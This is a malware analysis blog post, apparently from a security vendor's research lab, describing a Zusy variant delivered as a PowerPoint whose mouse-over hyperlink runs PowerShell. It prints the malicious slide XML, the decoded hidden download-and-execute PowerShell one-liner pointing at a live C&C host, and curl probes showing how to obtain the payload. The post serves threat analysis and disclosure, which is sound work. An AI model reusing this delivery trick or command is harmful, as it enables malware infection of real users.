By Caleb Fenton and Itai Liba, Senior Security Researchers, SentinelOne Labs
A new variant of a malware called “Zusy” has been found in the wild spreading as a PowerPoint file attached to spam emails with titles like “Purchase Order #130527” and “Confirmation”. It’s interesting because it doesn’t require the user to enable macros to execute. Most Office malware relies on users activating macros to download some executable payload which does most of the malicious stuff, but this malware uses the external program feature instead.
SentinelOne detects this threat and our users are protected.
- PowerPoint dropper: 796a386b43f12b99568f55166e339fcf43a4792d292bdd05dafa97ee32518921.
- First-stage JSE payload: 55821b2be825629d6674884d93006440d131f77bed216d36ea20e4930a280302
- Second-stage EXE payload 55c69d2b82addd7a0cd3bebe910cd42b7343bd3faa7593356bcdca13dd73a0ef
When the malicious PowerPoint file is opened, it shows a screen with a single link that says “Loading…Please wait”:
Hovering over the URL is when all the “magic” happens: it causes PowerPoint to execute an external program. In this case, it’s powershell plus a small script which downloads an additional payload.
However, the code doesn’t execute automatically as soon as the file is opened. Instead, both Office 2013 and Office 2010 display a severe warning by default:
Users might still somehow enable external programs because they’re lazy, in a hurry, or they’re only used to blocking macros. Also, some configurations may possibly be more permissive in executing external programs than they are with macros.
The PowerPoint viewer doesn’t seem to be vulnerable at all because it refuses to execute the program:
The code for the mouse over link is in ppt/slides/slide1.xml:
<a:hlinkMouseOver r:id="rId2" action="ppaction://program"/> The
rId2definition is in ppt/slides/_rels/slide1.xml.rels:
rId2 definition is in ppt/slides/_rels/slide1.xml.rels:
<Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="powershell%20-NoP%20-NonI%20-W%20Hidden%20-Exec%20Bypass%20%22IEX%20(New-Object%20System.Net.WebClient).DownloadFile(%27http%3A%27%2B%5Bchar%5D%200x2F%2B%5Bchar%5D%200x2F%2B%27cccn.nl%27%2B%5Bchar%5D%200x2F%2B%27c.php%27%2C%5C%22%24env%3Atemp%5Cii.jse%5C%22)%3B%20Invoke-Item%20%5C%22%24env%3Atemp%5Cii.jse%5C%22%22" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/>
The key bits are
TargetMode="External" and, of course, the
Target value, which is the shell command to execute. There’s a bit of related documentation of the PPT format here: http://python-pptx.readthedocs.io/en/latest/dev/analysis/shp-hyperlink.html#run-a-program
Target value is url-encoded and can be cleaned up with
urllib.unquote() to get this:
powershell -NoP -NonI -W Hidden -Exec Bypass "IEX (New-Object System.Net.WebClient).DownloadFile('http:'+[char] 0x2F+[char] 0x2F+'cccn.nl'+[char] 0x2F+'c.php',\"$env:temp\ii.jse\"); Invoke-Item \"$env:temp\ii.jse\""
[char] 0x2F is kind of weird and probably parsed by PowerPoint. The final, working version is below, with
http changed to
hxxp to avoid actually linking to a malicious URL:
powershell -NoP -NonI -W Hidden -Exec Bypass "IEX (New-Object System.Net.WebClient).DownloadFile('hxxp://cccn.nl/c.php','$env:temp\ii.jse'); Invoke-Item '$env:temp\ii.jse'"
This downloads whatever is at
c.php and stores it in a file named ii.jse.
The C&C is smart enough to check the user-agent. If the user-agent isn’t what it expects, you’re redirected to Google.
$ curl -I http://cccn.nl/c.php HTTP/1.1 302 Found Date: Thu, 01 Jun 2017 17:38:23 GMT Server: Apache/2 Location: http://google.com Vary: User-Agent Content-Type: text/html X-Cache: MISS from apollo Via: 1.1 apollo (squid/4.0.19) Connection: keep-alive
System.Net.WebClient has no user-agent. By simulating this in
curl, we get redirected to
/2.2 which eventually sends us the payload.
$ curl -I -A "" http://cccn.nl/c.php HTTP/1.1 302 Found Date: Thu, 01 Jun 2017 17:40:30 GMT Server: Apache/2 Location: http://cccn.nl/2.2 Vary: User-Agent Content-Type: text/html X-Cache: MISS from apollo Via: 1.1 apollo (squid/4.0.19) Connection: keep-alive
We confirmed the malware doesn’t have a user-agent by looking at its network traffic:
The WHOIS info for the domain doesn’t contain any personal information on who registered it. Also, many other domains associated with that IP, so it’s probably shared hosting.
JSE Payload Information
file on the payload returns an unhelpful
data result. However, it’s executable with
Invoke-Item which means Windows has to have a file handler for it and it’s saved with a
.jse extension. This indicates it’s a JScript Encoded File which is executed by WScript.
By running the original dropper sample in a virtual machine, we see the JSE payload eventually downloads an EXE payload. We’re still investigating this. If it’s interesting, we’ll write about it in a follow-up post.